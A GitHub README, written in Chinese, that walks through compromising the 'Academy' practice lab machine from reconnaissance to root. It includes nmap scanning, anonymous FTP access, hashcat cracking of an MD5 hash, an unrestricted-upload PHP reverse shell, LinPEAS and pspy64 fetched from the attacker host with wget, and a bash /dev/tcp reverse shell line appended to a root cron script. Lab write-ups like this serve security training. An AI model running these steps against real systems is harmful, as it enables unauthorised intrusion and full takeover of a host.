LexKingz/academy-linux-pentest-walkthrough
GitHub: LexKingz/academy-linux-pentest-walkthrough
一份详尽的Linux靶机渗透测试演练文档,完整记录了从侦察到获取root权限的攻击路径与操作步骤。
Stars: 0 | Forks: 0
# Academy Machine – 渗透测试 Walkthrough
本仓库记录了对 **Academy machine** 的攻陷过程,演示了从**初始侦察到获取 root 权限**的完整攻击路径。该 Walkthrough 涵盖了**服务枚举、凭据发现、Web 利用和权限提升**。
# 1. 侦察
获取目标机器的 IP 地址后,验证了连通性。
* 确认主机可用性:
```
ping [target-ip]
```
* 使用 **Nmap** 执行全端口服务扫描:
```
nmap -sC -sV -p- [target-ip]
```
发现的开放端口:
```
21/tcp ftp vsftpd 3.0.3
22/tcp ssh OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp http Apache/2.4.38 (Debian)
```
Web 服务器信息:
```
Apache2 Debian Default Page: It works
```
```
* screenshots/01-nmap-scan.png
* screenshots/02-nmap-scan.png
```
# 2. FTP 枚举
端口 **21 (FTP)** 允许**匿名登录**。
登录 FTP 服务:
```
ftp [target-ip]
```
在探索 FTP 服务器时,发现并下载了一个名为 **note.txt** 的文件。
```
* screenshots/03-ftp-explored.png
```
该文件包含说明和一个**哈希密码**。
```
cd73502828457d15655bbd7a63fb0bc8
```
```
* screenshots/04-note-txt.png
```
# 3. 哈希识别与破解
使用 **hash-identifier** 识别哈希类型。
```
* screenshots/05-hash-identify.png
```
识别出哈希类型为 **MD5**。
使用 **hashcat** 配合 rockyou 字典破解哈希。
```
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
```
```
* screenshots/06-crack-pswd-hash1.png
* screenshots/06b-crack-pswd-hash2.png
```
破解出的密码为:
```
student
```
# 4. Web 目录枚举
使用 **ffuf** 进行目录枚举。
```
sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://TARGET-IP/FUZZ
```
```
* screenshots/07-fuff-dirbusting.png
```
发现的目录包括:
```
/academy
/phpmyadmin
```
# 5. Web 应用程序访问
`/academy` 目录包含一个**登录页面**。
```
* screenshots/08-academy-dir-explore.png
```
使用先前发现的凭据成功登录。随后更改了密码。
```
* screenshots/09-login-password-changed.png
```
# 6. 文件上传漏洞利用
在用户个人资料页面中,发现了一个**图片上传功能**。
该应用程序**未验证文件类型**,允许任意文件上传。
为了确认上传目录路径,上传了一个测试图片。
```
* screenshots/10-profile-page-present-directory.png
```
# 7. Reverse Shell 上传
使用了来自 PentestMonkey 的 **PHP reverse shell**。
```
* screenshots/11-reverse-shell-payload.png
```
在攻击者机器上使用 Netcat 开启监听器:
```
nc -nvlp [port]
```
上传 reverse shell 文件后,成功获取了 shell 连接。
```
* screenshots/12-gain-shell-access.png
```
初始 shell 访问权限为:
```
www-data
```
# 8. 权限提升枚举
为了搜索权限提升路径,使用了 **LinPEAS**。
从以下地址下载 LinPEAS:
```
https://github.com/peass-ng/PEASS-ng
```
从攻击者机器提供文件服务:
```
python3 -m http.server 80
```
```
* screenshots/13-python-server.png
```
在目标机器上下载文件:
```
wget http://[attacker-ip]/linpeas.sh
```
```
* screenshots/14-linpeas-uploaded-to-victim.png
```
赋予文件执行权限并运行:
```
chmod +x linpeas.sh
./linpeas.sh
```
```
* screenshots/15-chmod-run-linpeas.png
```
枚举结果如下:
```
* screenshots/16-forensic-analysis1.png
* screenshots/17-forensic-analysis2.png
* screenshots/18-forensic-analysis3.png
```
# 9. 以另一用户身份进行 SSH 访问
进一步分析揭示了一个**名为 `grimmie` 的管理员账户**以及一个**重复使用的密码**。
使用这些凭据获得了 SSH 访问权限。
```
* screenshots/19-admin-shell-gained.png
```
当前用户访问权限:
```
grimmie
```
# 10. 调查计划任务
在 `/home/grimmie` 目录中,发现了一个名为 **backup.sh** 的脚本。
```
* screenshots/20-backup-sh-file.png
```
该脚本似乎用于执行定期备份。
为了监控后台进程,使用了 **pspy64**。
下载并分发该工具:
```
python3 -m http.server 80
```
在目标机器上下载:
```
wget http://[attacker-ip]/pspy64
```
赋予执行权限并运行:
```
chmod +x pspy64
./pspy64
```
```
* screenshots/21-run-pspy64-1.png
* screenshots/22-run-pspy64-2.png
```
该工具显示 **backup.sh 每分钟以 root 权限执行一次**。
# 11. 通过脚本滥用进行权限提升
修改了现有脚本以包含 **reverse shell payload**。
原始脚本:
```
* screenshots/23-previous-bash-sh.png
```
```
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
```
修改后的脚本:
```
* screenshots/24-modified-backup-sh.png
```
添加了一行 reverse shell 代码:
```
bash -i >& /dev/tcp/[attacker-ip]/8080 0>&1
```
在攻击者机器上启动监听器:
```
nc -nvlp 8080
```
当计划的备份任务执行时,成功获取了 **root shell**。
```
* screenshots/25-gained-root-shell.png
```
# 成功获取 Root 权限
最终权限级别:
```
root
```
# 展示的关键技能
* FTP 枚举和匿名登录利用
* 使用 Hashcat 进行哈希识别和密码破解
* 使用 FFUF 进行 Web 目录暴力破解
* 通过不安全文件上传进行 Web 应用程序利用
* Reverse Shell 部署
* 使用 LinPEAS 进行 Linux 权限提升枚举
* 使用 pspy64 监控系统进程
* 滥用以 root 权限运行的计划脚本
* 多用户权限提升技术
标签:Bitdefender, CSV导出, CTI, FFUF, FTP 匿名登录, Hashcat, HTTP工具, Linux 安全, MD5 解密, Nmap, Python3.6, Walkthrough, Web 安全, Writeup, 协议分析, 密码管理, 应用安全, 插件系统, 教育实验环境, 权限提升, 目录枚举, 移动安全, 网络安全, 网络安全审计, 虚拟驱动器, 隐私保护, 靶机实战